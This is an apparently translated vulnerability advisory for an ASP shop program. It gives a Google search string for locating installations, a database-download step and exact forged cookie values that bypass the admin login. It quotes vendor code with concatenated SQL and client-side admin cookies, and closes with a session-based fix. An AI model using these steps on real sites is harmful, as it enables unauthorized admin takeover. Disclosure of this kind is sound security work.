Polyethylene commercial po-2.0: database exposure and cookie spoofing vulnerability and repair - Vulnerability warning - Black Bar Safety Net

2012-04-07T00:00:00
ID MYHACK58:62201233582
Type myhack58
Reporter Anonymous
Modified 2012-04-07T00:00:00

Description

Program: A commercial po-2.0

google keywords: intext:technical support: Ben Ming technology poly commercial po

A few days ago I came across a program called poly commercial treasure; the source code can be downloaded here. Only today did I have time to take a quick look...

Vulnerability: database exposure and back-end cookie spoofing

1. Directly accessing conn/conn.asp exposes the database address; download it, decrypt, and sign in to the back end.

2. Cookie spoofing. Code snippet from the check.asp file in the admin folder:

```asp
<%
' Replace_Text, md5, Logerr, getIP and the conn connection object are
' not shown in this snippet.
dim uid,upwd
uid=Replace_Text(Request.Form("userid"))
upwd=md5(Replace_Text(Request.Form("password")),16)
Verifycode=Replace_Text(request.Form("verifycode"))

' Reject a missing, non-numeric or wrong verification code
if not isnumeric(Verifycode) then
    Call Logerr()
    Call ErroFy()
end if
if Cint(Verifycode)<>Session("SafeCode") then
    Call ErroFy()
else
    ' Look up the administrator by user name and 16-character MD5 of the password
    Set rs=server.createobject("adodb.recordset")
    sqltext="select * from benming_master where Username='" & uid & "' and [PassWord]='" & upwd & "'"
    rs.open sqltext,conn,1,1
    If Rs.Eof And Rs.Bof Then
        response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
        response.write"<TR>"
        response.write"<TH class=tableHeaderText colSpan=2 height=25>appear the error message</TH>"
        response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>login or password incorrect!</div></td></tr>"
        response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'><< back</a></td>"
        response.write"</tr>"
        response.write"</table>"
    else
        ' Login succeeded: the admin identity is written to plain client-side cookies
        Response.Cookies("globalecmaster")=rs("username")
        Response.Cookies("masterflag")=rs("flag")
        Response.Cookies("adminid")=rs("id")
        LastLogin=Date()
        LastLoginIP=getIP()
        sql="update benming_master set LastLogin='"&LastLogin&"',LastLoginIP='"&LastLoginIP&"' where username='"&uid&"'"
        conn.execute(sql)
        response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
        response.write"<TR>"
        response.write"<TH class=tableHeaderText colSpan=2 height=25>login success tips</TH>"
        response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>successful through the website backstage administrator certification!<br><br>2 seconds after the automatic into the background...</div></td></tr>"
        response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='index.asp'>enter the backstage management</a></td>"
        response.write"</tr>"
        response.write"</table>"
%>
<meta HTTP-EQUIV=refresh Content='2;url=index.asp'>
<%
    end if
    rs.close
    set rs=nothing
end if

' Prints the verification-code error box and ends the response
Sub ErroFy()
    response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
    response.write"<TR>"
    response.write"<TH class=tableHeaderText colSpan=2 height=25>appear the error message</TH>"
    response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>verification code error!</div></td></tr>"
    response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'><< back</a></td>"
    response.write"</tr>"
    response.write"</table>"
    Response.End()
End Sub
%>
```

Method of use: use D to access the back end directly, modify the cookie as follows, and then access admin/index.asp to log in.

globalecmaster=admin; masterflag=01%2C%2002%2C%2003%2C%2004%2C%2005%2C%2006%2C%2007%2C%2008%2C%2009%2C%20010; adminid=1
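One way to close the cookie-spoofing hole, shown as an added example that is not part of the original advisory or the vendor's code: keep the login state in the server-side Session instead of in client cookies, and check it at the top of every admin page. The Session key names, the `RequireAdmin` helper and the parameterized query are assumptions; `conn`, `uid`, `upwd` and the `benming_master` columns are the names used in the check.asp snippet.

```asp
<%
' Added example. Part 1: in admin/check.asp, in place of the
' Response.Cookies(...) lines. Assumes conn is the open ADODB connection
' and uid / upwd were read from the form as in the original snippet.
Const adVarChar = 200, adParamInput = 1

Dim cmd, rs
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "select id, username, flag from benming_master " & _
                  "where Username=? and [PassWord]=?"
' Bound parameters: form input never becomes part of the SQL text.
cmd.Parameters.Append cmd.CreateParameter("u", adVarChar, adParamInput, 255, Left(uid, 255))
cmd.Parameters.Append cmd.CreateParameter("p", adVarChar, adParamInput, 255, Left(upwd, 255))
Set rs = cmd.Execute

If rs.EOF Then
    rs.Close
    Session.Abandon                 ' failed login: discard any earlier state
    Response.Redirect "login.asp"
Else
    ' Login state is kept on the server. The browser holds only the ASP
    ' session id, so editing cookie values cannot set these fields.
    Session("adminid")        = rs("id").Value
    Session("globalecmaster") = rs("username").Value & ""
    Session("masterflag")     = rs("flag").Value & ""
    rs.Close
    Response.Redirect "index.asp"
End If

' Part 2: hypothetical guard (the name is an assumption). Put it in an
' include and call RequireAdmin first thing in every page under admin/.
Sub RequireAdmin()
    If IsEmpty(Session("adminid")) Then
        Session.Abandon
        Response.Redirect "login.asp"
    End If
End Sub
%>
```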